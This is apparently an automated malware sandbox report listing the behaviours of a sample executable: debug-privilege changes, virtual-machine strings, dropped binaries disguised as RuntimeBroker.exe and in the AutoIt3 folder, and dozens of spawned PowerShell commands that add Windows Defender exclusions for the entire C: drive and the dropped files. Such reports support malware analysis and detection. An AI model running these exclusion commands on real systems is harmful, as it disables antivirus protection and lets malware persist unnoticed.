                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1620188140.000000001C209000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: w32tm.exe, 0000004F.00000002.1535058192.0000014BC58C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Adds a directory exclusion to Windows Defender
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline"Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.cmdline"Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1ke8OVZbVo.bat" Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6986.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2072A4DD6B9C45BD955850FB555C1F90.TMP"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6B99.tmp" "c:\Windows\System32\CSC5918AA24663347D392372538DC1C654.TMP"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeQueries volume information: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeQueries volume information: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeQueries volume information: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeQueries volume information: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeQueries volume information: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
